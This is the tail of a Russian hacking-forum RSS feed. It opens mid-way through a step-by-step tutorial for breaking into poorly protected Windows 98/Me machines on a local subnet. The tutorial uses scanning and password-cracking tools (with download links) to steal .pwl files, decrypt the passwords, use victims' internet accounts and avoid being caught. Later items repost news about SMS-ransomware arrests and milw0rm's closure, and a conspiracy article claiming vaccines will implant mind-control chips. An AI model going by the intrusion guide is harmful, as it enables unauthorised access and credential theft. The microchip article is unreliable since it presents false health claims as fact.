						&lt;p&gt;Устaновка программ : &lt;br /&gt;Тебе понадобяться 2 программы : Это HackTools так что антивирь будет ругаться &lt;br /&gt;Shared Resourse Scanner 6.2 (вот ссылка &lt;a href=&quot;http://depositfiles.com/files/vnekr2rlz&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://depositfiles.com/files/vnekr2rlz&lt;/a&gt; ),сама прога которая заходит на чужие компьютеры. crack &lt;br /&gt;PwlToolsNet 6.5 (вот ссылка &lt;a href=&quot;http://depositfiles.com/files/g518o0ay8&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://depositfiles.com/files/g518o0ay8&lt;/a&gt;), она расшифровывает пароли, которые вы &amp;quot;позаимствовали&amp;quot;. &lt;br /&gt;Скачай программы, установи (это несложно) их. &lt;br /&gt;Готово ! &lt;/p&gt;
						&lt;p&gt;Взлом : &lt;br /&gt;Входишь в Интернет, &lt;br /&gt;Нажимаешь &amp;quot;ПУСК&amp;quot; &amp;quot;Выполнить&amp;quot;. &lt;br /&gt;Впиши в поле winipcfg &lt;br /&gt;В откывшемся окне запомни Ip-адрес ! &lt;br /&gt;Он примерно такой : 192.168.255.45 Т.е. из 4 цифр &lt;br /&gt;Теперь запусти srs ,( Shared Resourse Scanner 6.2 , который вы скачали ), &lt;br /&gt;Справа панель управления , &lt;br /&gt;Там где 2 поля, делящиеся на точки впиши Ip-адрес : &lt;br /&gt;Допустим у тебя 192.168.255.45, &lt;br /&gt;то в верхнее поле вписываешь весь Ip-адрес, &lt;br /&gt;только самое последнее - изменяете на &amp;quot;1&amp;quot; &lt;br /&gt;Было 192.168.255.45, пишешь 192.168.255.1 &lt;br /&gt;В нижнее поле впиши также, только последнее - &lt;br /&gt;измени на &amp;quot;255&amp;quot;.Было 192.168.255.45, пишешь 192.168.255.255 &lt;br /&gt;Теперь в поле &amp;quot;Time Out:&amp;quot; Впиши &amp;quot;100&amp;quot;. &lt;br /&gt;СТАРТ ! &lt;/p&gt;
						&lt;p&gt;В окне программы появяться компы . &lt;br /&gt;Тонким шрифтом обозначены защищенные компы. &lt;br /&gt;Жирным шрифтом - плохо защищенные. &lt;br /&gt;Красным толстым - полностью открытые. &lt;br /&gt;Заходи на компы с пометкой Win98/Me. &lt;br /&gt;Выделяешь жирный или красный комп --&amp;gt; &amp;quot;Открыть&amp;quot; &lt;br /&gt;В открывшемся, через некоторое время,окне будут диски ламера. &lt;br /&gt;Выбери диск &amp;quot;С&amp;quot;,далее папку &amp;quot;Windows&amp;quot; или &amp;quot;Win98&amp;quot; или &amp;quot;Win&amp;quot; или &amp;quot;Windows&amp;quot;, &lt;br /&gt;В общем системную папку Windows 98. &lt;br /&gt;Найди файлы с расширением файла *.pwl (Но если у тебя нормально работает &lt;br /&gt;PwlNetTools,то файл будет в виде такого значка : &lt;/p&gt;
						&lt;p&gt;Итак, копируем его к себе . &lt;br /&gt;Открываем программy PwlNetTools. &lt;br /&gt;Кнопка &amp;quot;Browse&amp;quot; --&amp;gt; Выбираем файл,который мы скачали. &lt;br /&gt;Кнопкой &amp;quot;CheckPass&amp;quot; Мы узнаём пароли . &lt;br /&gt;Вот, собственно и всё. &lt;br /&gt;P.S. Кстати насчёт ловли хакеров-самоучек : &lt;br /&gt;Ты выходишь в Интернет под чужими паролями, &lt;br /&gt;Сидишь, короче, наслаждаешься. &lt;br /&gt;Тот человек, у кого ты &amp;quot;позаимствовал&amp;quot; Интернет тоже &lt;br /&gt;хочет зайти. Вот заходит он -&amp;quot;Проверка имени и пароля&amp;quot;. &lt;br /&gt;&amp;quot;Ошибка : Такой пользователь существует&amp;quot;. &lt;br /&gt;Он, матерясь, звонит на телефон поддержки. &lt;br /&gt;-Вы, мля ,чё творите !У меня не заходит ,МЛЯ ! &lt;br /&gt;-Ой, сейчас мы посмотрим ! &lt;br /&gt;Смотрят они - такой уже лазит в просторах WWW. &lt;br /&gt;Определяют телефон - Пиз@ец ! &lt;br /&gt;P.P.S. Чтобы такого не было определи, в какое время &lt;br /&gt;Этот Чайник сидит в Интернете&lt;/p&gt;</description>
			<author>mybb@mybb.ru (zero0day)</author>
			<pubDate>Thu, 03 Feb 2011 13:10:13 +0300</pubDate>
			<guid>http://netxak.apbb.ru/viewtopic.php?pid=6#p6</guid>
		</item>
		<item>
			<title>Чипы будут вживлять через вакцину от гриппа</title>
			<link>http://netxak.apbb.ru/viewtopic.php?pid=5#p5</link>
			<description>&lt;p&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://soft.mail.ru/Screens/news/2010/12/21/te_148680.jpg&quot; alt=&quot;http://soft.mail.ru/Screens/news/2010/12/21/te_148680.jpg&quot; /&gt;&lt;/p&gt;
						&lt;p&gt;содрал с мэйл ру&lt;/p&gt;
						&lt;p&gt;Автор статьи «Чипирование через вакцинацию» Татьяна Грачева утверждает - в ближайшем будущем нас ожидает массовое чипирование с помощью введения специальных нанопрепаратов. А сфабрикованная масштабная пандемия гриппа является прекрасным поводом для такой глобальной вакцинации. &lt;/p&gt;
						&lt;p&gt;Впервые о нанотехнологиях сказал нобелевский лауреат Ричард Фейман, почти 50 лет назад предсказавший, что человек сможет конструировать материальный мир, манипулируя атомами и молекулами, как болтами и гайками. Само же понятие «нанотехнология» ввел в 1974 году японец Норе Танигути для описания процесса построения новых объектов и материалов при помощи манипуляций с отдельными атомами. По сути, это стало началом третьей научно-технической революции. При этом ученые впервые получили возможность по своей воле создавать новую материю, основанную на искусственной регуляции. В России предприятие по производству нановакцин и терапевтических биопрепаратов в количестве 10 млн. упаковок в год планируется сдать в эксплуатацию в первом квартале 2011 года. &lt;/p&gt;
						&lt;p&gt;Как считают эксперты, в настоящее время совершенно непредсказуемо, что будут делать наночипы в организме человека. В декабре 2000 года бывший глава Департамента здравоохранения Финляндии Рауни-Лина Лууканен-Килде заявила, что сейчас технически возможно внедрить каждому новорожденному микрочип, который будет затем функционировать как контролирующее устройство внутри человека в течение всей его жизни. Такие планы секретно обсуждаются в США. &lt;/p&gt;
						&lt;p&gt;Сегодня микрочипы действуют с помощью направляемых на них низкочастотных радиоволн. Через спутник чипированное лицо может быть отслежено в любой точке земного шара. По словам доктора Карла Сандерса, эта техника была уже испытана во время войны в Ираке. Сандерс изобрел разведывательный, дистанционно управляемый оператором интерфейсный биотик, который имплантировали в людей. В результате суперкомпьютеры в Агентстве национальной безопасности США могли «видеть и слышать», отслеживать поведение каждого военнослужащего на поле боя с помощью Системы дистанционного контроля (RMS). &lt;/p&gt;
						&lt;p&gt;С помощью компьютера RMS оператор может посылать электромагнитные сигналы в нервную систему, влияя таким образом на человека. RMS позволяет заставить совершенно здорового человека видеть галлюцинации и слышать голоса. Электромагнитное стимулирование может влиять на функции мозга и мускульную активность, вызывая спазмы и приступы острой боли, подобно пытке. Используя различные частоты, тайный оператор, работающий с компьютером, может даже менять эмоциональную жизнь человека, вызывая агрессию или апатию. Точно так же можно искусственно влиять на половую функцию человека и контролировать не только сознание, но и подсознание. Человеку можно внушать даже мечты. &lt;/p&gt;
						&lt;p&gt;Внедрение наномикрочипов в вакцины - вопрос ближайшего будущего. Производители нановакцин будут стараться «продать» идею населению. Для того чтобы заставить его согласиться на нановакцинацию, будут пущены в ход всевозможные сценарии о якобы оздоровляющем действии препаратов. Производители и разработчики этих вакцин будут представлять составленные ими же самими «документы» и «доказательства», свидетельствующие об их эффективности. Так, к 2015 г. эффективная адресная доставка лечебных препаратов станет массовой методикой, достигшей коммерческой стадии. &lt;/p&gt;
						&lt;p&gt;Российские ученые ведут работы по повышению эффективности внешнего управления внедренными чипами. Как пишут «Ведомости», они «разработали новую методику введения в наноконтейнеры частиц магнетита и золота. Магнетит позволяет дистанционно управлять пространственным распределением микрокапсул с помощью магнитного поля, а золотые частички помогают следить за перемещениями вводимых капсул, а также дистанционно вскрывать их. Другая интересная технология — доставка препарата за счет использования аэрозоля с наночастицами. Ученые разработали генератор для производства лекарства и провели эксперимент с мышами, чтобы оценить эффективность аэрозольной формы доставки препарата. Как оказалось, противовоспалительное лекарство в форме аэрозоля эффективнее, чем введенное в желудок, даже в том случае, когда аэрозольная доза была в миллион раз меньше». «Для введения новых вакцин не нужны уколы — их можно просто закапывать в нос». &lt;/p&gt;
						&lt;p&gt;Эйфории по поводу всех этих наночастиц разделяют не все. Например, ряд ученых считает, что при попадании наночастиц внутрь ядер клеток наблюдается токсикация, в частности, повреждение ДНК и отклонения в наборах хромосом (а это уже касается генофонда нации и может рассматриваться как генное оружие). Ко всему прочему, воздействие наночастиц серебра приводит к накапливанию крови в разных частях тела, таким образом, вызывая отеки и некрозы. Как считает академик РАМН Сергей Колесников, «наносубстанции могут обладать огромной разрушительной силой, поскольку мы еще толком не знаем, как они могут влиять на организм. Требуются новые и очень серьезные исследования. Необходимо избежать ошибок предшественников, которые не учитывали вопросы безопасности при работе с новейшими технологиями. По словам Сергея Колесникова, достаточно вспомнить, как начиналась ядерная энергетика - и если уже сегодня не наладить контроль, то последствия могут быть катастрофическими».&lt;/p&gt;</description>
			<author>mybb@mybb.ru (zero0day)</author>
			<pubDate>Thu, 03 Feb 2011 13:02:28 +0300</pubDate>
			<guid>http://netxak.apbb.ru/viewtopic.php?pid=5#p5</guid>
		</item>
		<item>
			<title>Хакеры заработали более миллиарда</title>
			<link>http://netxak.apbb.ru/viewtopic.php?pid=4#p4</link>
			<description>&lt;p&gt;В Москве задержана группа хакеров, от действий которых пострадали десятки тысяч пользователей Интернета, чьи компьютеры были заражены вирусом.&lt;/p&gt;
						&lt;p&gt;При этом кибермошенники вымогали у своих жертв деньги за возможность получить пароль и избавиться от вредоносной программы. Преступная группировка действовала с небывалым размахом — доход мошенников, по данным следствия, составил за год более одного миллиарда рублей.&lt;/p&gt;
						&lt;p&gt;Корреспондент НТВ Дмитрий Новиков с подробностями.&lt;/p&gt;
						&lt;p&gt;Кибервредители — молодые программисты, москвичи, всего 10 человек — были задержаны с поличным. На кадрах — их лаборатория вирусов, здесь они создавали, тестировали, а затем выпускали вредоносную программу во всемирную паутину. По данным следствия, только в апреле нынешнего года программисты-вредители заразили и заблокировали три тысячи компьютеров.&lt;/p&gt;
						&lt;p&gt;За время мошеннической деятельности, не выходя из своих офисных помещений, создателям вирусов удалось заработать на лечении зараженных ими же компьютеров более 1 миллиарда рублей.&lt;/p&gt;
						&lt;p&gt;Филипп Золотницкий, руководитель пресс-службы Управления по борьбе с экономическими преступлениями ГУВД по г. Москве: «Уже сейчас установлено, что от деятельности этих мошенников страдали не только в России, но и в близлежащих странах — на Украине, в Белоруссии, Казахстане, Прибалтике. Там также происходило заражение компьютеров участниками этой преступной группировки».&lt;/p&gt;
						&lt;p&gt;Схема отъема денег была напрямую связана с предоставлением сотовыми операторами возможности пользоваться платными короткими номерами. Мошенники внедряли свои вредоносные программы не только в сайты-ловушки (как правило, это были сайты с картинками для взрослых), но и даже заражали серверы респектабельных информационно-развлекательных порталов.&lt;/p&gt;
						&lt;p&gt;Стоило пользователю нажать на опасную ссылку, тут же происходило скачивание вируса-блокиратора в операционную систему компьютера. Появлялась надпись «компьютер заблокирован», и чтобы его разблокировать, создатели вируса просили отправить сообщение на платный короткий номер. Максимальная стоимость одного такого сообщения — 700 рублей.&lt;/p&gt;
						&lt;p&gt;Филипп Золотницкий: «Проверяется информация о действии аналогичных преступных групп, хоть и не таких крупных по размаху своей деятельности, но, тем не менее, действующих в России. В настоящее время проводятся все необходимые технические мероприятия для привлечения их к уголовной ответственности. А также будет проводиться необходимая работа с операторами мобильной связи, которые предоставляют короткие номера для подобного рода нечистоплотных дельцов».&lt;/p&gt;
						&lt;p&gt;Интересно, что мошенники никогда бы не смогли заработать свои миллионы, если бы не пробелы в законодательстве. Операторы сотовой связи не обязаны разбираться, за что приходят деньги, списываемые за отправку сообщений на короткие номера. Следователи уже провели более 20 обысков у операторов большой тройки: МТС, «Билайн» и «Мегафон». Именно в их электронных базах данных хранятся телефонные номера пострадавших от действий программистов-вредителей.&lt;/p&gt;
						&lt;p&gt;После обработки всей этой информации должна проясниться полная картина этого невиданного по своим масштабам кибермошенничества.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (zero0day)</author>
			<pubDate>Thu, 03 Feb 2011 12:55:59 +0300</pubDate>
			<guid>http://netxak.apbb.ru/viewtopic.php?pid=4#p4</guid>
		</item>
		<item>
			<title>В Москве возбуждено первое дело о мошенничестве через SMS-номера</title>
			<link>http://netxak.apbb.ru/viewtopic.php?pid=3#p3</link>
			<description>&lt;p&gt;В Москве возбуждено первое уголовное дело по факту мошенничества с использованием коротких SMS-номеров. По поручению Генеральной прокуратуры России &amp;quot;прокуратура Москвы организовала проверку по фактам мошенничества путем распространения в интернете вредоносных программ, блокирующих нормальную работу компьютеров&amp;quot;, отметили представители прокуратуры.&lt;br /&gt;&amp;quot;Установлено, что некоторые фирмы, оказывающие услуги в области связи и доступа в интернете, создавали вредоносные программы Winlock, которые размещали на управляемых ими интернет-ресурсах. После посещения зараженного ресурса пользователями, мошенники получали доступ к информации, содержащейся на персональных компьютерах, которые блокировались. С целью завладения денежными средствами пользователей злоумышленники использовали короткие SMS-номера, в том числе номер 1350, предлагая за денежное вознаграждение сообщить код разблокировки компьютера&amp;quot;, - сообщили в прокуратуре Москвы. Только за апрель таким способом был извлечен доход в размере более 790 тысяч рублей.&lt;br /&gt;По результатам проверки Главное следственное управление при ГУВД Москвы возбудило уголовное дело по статьям &amp;quot;мошенничество&amp;quot; и &amp;quot;создание, использование и распространение вредоносных программ для ЭВМ&amp;quot;. Ход следствия контролируется прокуратурой Москвы.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (zero0day)</author>
			<pubDate>Thu, 03 Feb 2011 12:53:35 +0300</pubDate>
			<guid>http://netxak.apbb.ru/viewtopic.php?pid=3#p3</guid>
		</item>
		<item>
			<title>Milw0rm неработает</title>
			<link>http://netxak.apbb.ru/viewtopic.php?pid=2#p2</link>
			<description>&lt;p&gt;Один из крупнейших в сети Интернет порталов с коллекциями эксплоитов, milw0rm.com, перестал функционировать. Причину закрытия сайта его владелец, известный под ником &amp;quot;str0ke&amp;quot;, объясняет лишь несколькими скупыми строчками. По его словам, анализировать и выкладывать эксплоиты за адекватные промежутки времени стало попросту невозможно. Вот что он написал: &lt;/p&gt;
						&lt;p&gt;В последние три месяца мне приходилось упорно трудиться, чтобы проделанная людьми работа появлялась достаточно быстро и этим можно было гордиться. Однако временной интервал от нуля до 72 часов для авторов эксплоитов на этом сайте кажется несправедливым.&lt;/p&gt;
						&lt;p&gt;Str0ke не пояснил, была ли причина в простом отсутствии времени или слишком большом числе эксплоитов, или же она заключается и в том, и в другом. Кроме того, неясно, будет ли существующая страница и база данных доступна и дальше, или сайт отключат от Сети. Возможно, на помощь str0ke придут другие члены сообщества или они возьмут на себя управление ресурсом.&lt;/p&gt;
						&lt;p&gt;Изначально milw0rm был всемирной группировкой хакеров, члены которой общались через IRC. Группа получила международную известность после того, как в июне 1998 года проникла в компьютеры Атомного исследовательского центра Бхабха (BARC), скачав оттуда электронные письма и засекреченные документы о ядерных испытаниях. Личности членов этой хакерской группы властями не установлены до сих пор. Кроме того, предположения о том, что закрытие milw0rm вызвано инициированным ФБР расследованием, на данный момент выглядят необоснованными. &lt;/p&gt;
						&lt;p&gt;После взлома BARC группа распалась, а ее бывший участник (ранее известный как &amp;quot;keystroke&amp;quot;) взял себе новый ник &amp;quot;str0ke&amp;quot; и в 2004 году основал milw0rm. &lt;/p&gt;
						&lt;p&gt;Возможной альтернативой milw0rm может стать сайт Packet Storm, существующий уже более десяти лет. Начиная с июля, за появляющимися там эксплоитами и утилитами можно следить через сервис Twitter. Ресурс Bugtraq тоже предлагает базу эксплоитов, но она может подвергаться цензуре со стороны Symantec. Так, в апреле о подобном случае во всеуслышание заявил создатель эксплоитов Kingcope.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (zero0day)</author>
			<pubDate>Thu, 03 Feb 2011 12:50:18 +0300</pubDate>
			<guid>http://netxak.apbb.ru/viewtopic.php?pid=2#p2</guid>
		</item>
	</channel>
</rss>
